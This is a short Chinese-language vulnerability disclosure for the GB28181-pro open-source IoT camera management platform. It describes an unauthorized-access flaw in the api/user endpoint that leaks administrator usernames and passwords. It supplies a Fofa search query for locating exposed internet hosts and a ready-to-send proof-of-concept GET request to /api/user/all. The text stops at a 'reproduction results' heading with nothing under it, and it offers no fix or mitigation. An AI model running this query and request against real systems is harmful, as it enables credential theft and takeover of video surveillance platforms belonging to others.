漏洞描述：

GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构，包括前端设备、存储设备、管理平台等组成部分，以及设备接入、流媒体传输、信令交互、存储管理、安全防护和平台管理等方面的要求。

GB28181-pro开源物联网摄像头管理平台api/user存在未授权访问漏洞，攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。

搜索语法:

Fofa-Query: body="国标28181"

漏洞详情：

1.GB28181物联网摄像头管理平台。

2.漏洞POC：

GET /api/user/all HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

3.漏洞复现结果。